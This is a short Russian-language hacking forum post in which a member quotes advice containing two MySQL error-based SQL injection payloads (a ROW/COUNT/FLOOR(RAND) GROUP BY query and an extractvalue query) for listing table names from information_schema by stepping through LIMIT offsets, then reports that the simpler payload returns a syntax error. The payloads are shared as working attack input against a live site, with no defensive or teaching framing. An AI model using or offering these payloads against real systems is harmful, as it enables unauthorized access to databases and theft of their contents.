
07.12.2014, 23:22
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
Код:
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
и перебирайте лимитом все поля
и, кстати, можно проще запрос
Код:
and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))--+
спасибо ,вот проще не идёт
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '";}',
|
|
|